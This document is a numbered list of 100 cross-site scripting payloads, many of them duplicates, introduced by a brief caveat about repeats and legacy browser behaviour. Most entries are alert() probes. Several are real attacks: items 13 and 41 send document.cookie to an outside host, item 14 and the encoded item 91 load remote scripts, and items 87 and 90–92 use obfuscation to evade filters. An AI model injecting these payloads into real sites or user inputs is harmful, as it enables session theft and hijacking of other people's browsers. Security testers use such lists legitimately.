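Top 100 Cross-Site Scripting (XSS) Payloads

Note: many entries repeat. Items 31–58 repeat entries from items 2–30, items 73–79 repeat 65–71, and items 99–100 repeat 83–84, so the list holds far fewer than 100 distinct test strings. Several entries also depend on legacy browser behaviour (for example CSS expression() and <isindex>), so a string that does not fire in a current browser does not by itself show that output encoding or the Content Security Policy is correct.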

1. <script>alert('XSS')</script>
2. <img src="javascript:alert('XSS');">
3. <svg/onload=alert('XSS')>
4. <body onload=alert('XSS')>
5. <img src=x onerror=alert('XSS')>
6. <input type="text" value="``onmouseover=alert('XSS')">
7. <a onmouseover="alert('XSS')">link</a>
8. <div style="xg-p:expression(alert('XSS'))">
9. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
10. <iframe src="javascript:alert('XSS');">
11. <a href="javascript:alert('XSS');">Link</a>
12. <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
13. <script>document.location='http://www.example.com/XSS.php?xss='+encodeURIComponent(document.cookie)</script>
14. <script src="http://www.example.com/XSS.js"></script>
15. <img src="http://www.example.com/XSS.jpg" onerror="alert('XSS')" />
16. <iframe src="http://www.example.com/XSS.html"></iframe>
17. <b onmouseover="alert('XSS')">bold</b>
18. <div onmouseover="alert('XSS')">text</div>
19. <img src="http://www.example.com/xss.png" onmouseover="alert('XSS')" />
20. <input autofocus onfocus=alert('XSS')>
21. <video><source onerror="alert('XSS')">
22. <isindex type=image src="javascript:alert('XSS')">
23. <a onmouseover=alert('XSS')>link</a>
24. <script>document.getElementById('xss').innerHTML='<script>alert('XSS')</script>'</script>
25. <iframe src=# onmouseover="alert('XSS')">
26. '><script>alert('XSS')</script>
27. ';alert('XSS');var foo='
28. <script>a=/XSS/
alert(a.source)</script>
29. <script>alert('XSS');</script>
30. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
31. <body onload=alert('XSS')>
32. <img src="javascript:alert('XSS');">
33. <svg/onload=alert('XSS')>
34. <input type="text" value="``onmouseover=alert('XSS')">
35. <a onmouseover="alert('XSS')">link</a>
36. <div style="xg-p:expression(alert('XSS'))">
37. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
38. <iframe src="javascript:alert('XSS');">
39. <a href="javascript:alert('XSS');">Link</a>
40. <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
41. <script>document.location='http://www.example.com/XSS.php?xss='+encodeURIComponent(document.cookie)</script>
42. <script src="http://www.example.com/XSS.js"></script>
43. <img src="http://www.example.com/XSS.jpg" onerror="alert('XSS')" />
44. <iframe src="http://www.example.com/XSS.html"></iframe>
45. <b onmouseover="alert('XSS')">bold</b>
46. <div onmouseover="alert('XSS')">text</div>
47. <img src="http://www.example.com/xss.png" onmouseover="alert('XSS')" />
48. <input autofocus onfocus=alert('XSS')>
49. <video><source onerror="alert('XSS')">
50. <isindex type=image src="javascript:alert('XSS')">
51. <a onmouseover=alert('XSS')>link</a>
52. <script>document.getElementById('xss').innerHTML='<script>alert('XSS')</script>'</script>
53. <iframe src=# onmouseover="alert('XSS')">
54. '><script>alert('XSS')</script>
55. ';alert('XSS');var foo='
56. <script>a=/XSS/
alert(a.source)</script>
57. <script>alert('XSS');</script>
58. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
59. “><sCript>alert(‘XSS’)</sCript>
60. <img/src='http://url.to.file.which/not.exist' onerror=alert(document.cookie)
61. <svg><script>alert&#40;1&#41; {Opera}
62. <img src=`xx:xx`onerror=alert(1)>
63. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ ">
64. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
65. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
66. <img/src=`%00` onerror=alert(1)>
67. <script/src="data:text/javascript,alert(1)"></script a>
68. <iframe src="javascript:alert('XSS')"
69. "><script>alert('XSS')</script>
70. <svg><script>alert("XSS")</script>
71. <img src=x onerror="alert('XSS')">
72. <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
73. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
74. <img/src=`%00` onerror=alert(1)>
75. <script/src="data:text/javascript,alert(1)"></script a>
76. <iframe src="javascript:alert('XSS')"
77. "><script>alert('XSS')</script>
78. <svg><script>alert("XSS")</script>
79. <img src=x onerror="alert('XSS')">
80. <a href="data:text/html;base64_,<script>alert('XSS')</script>">XSS</a>
81. <embed src="javascript:alert('XSS');">
82. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
83. <script>document.write("<script>alert('XSS')</script>")</script>
84. <script>alert(String.fromCharCode(88,83,83))</script>
85. <img src=x onerror="alert(String.fromCharCode(88,83,83))">
86. <img src=x onerror=alert(/XSS/.source)>
87. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;:/&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;/&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;(1)>
88. <svg><script>//&NewLine;confirm(1);</script </svg>
89. <img src="/" =_=" title="onerror='prompt(1)'">
90. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
91. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click
92. <svg><style>&#111;&#110;&#45;&#101;&#109;&#111;&#116;&#105;&#111;&#110;&#58;&#97;&#108;&#101;&#114;&#116&#40;1&#41;</style>
93. <math><a xlink:href="//jsfiddle.net/t846h/">click
94. <object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+"></object>
95. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
96. <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
97. <embed src="javascript:alert('XSS');"></embed>
98. <img src="http://www.mysite.com/image.jpg" onerror="alert('XSS')">
99. <script>document.write("<script>alert('XSS')</script>")</script>
100. <script>alert(String.fromCharCode(88,83,83))</script>
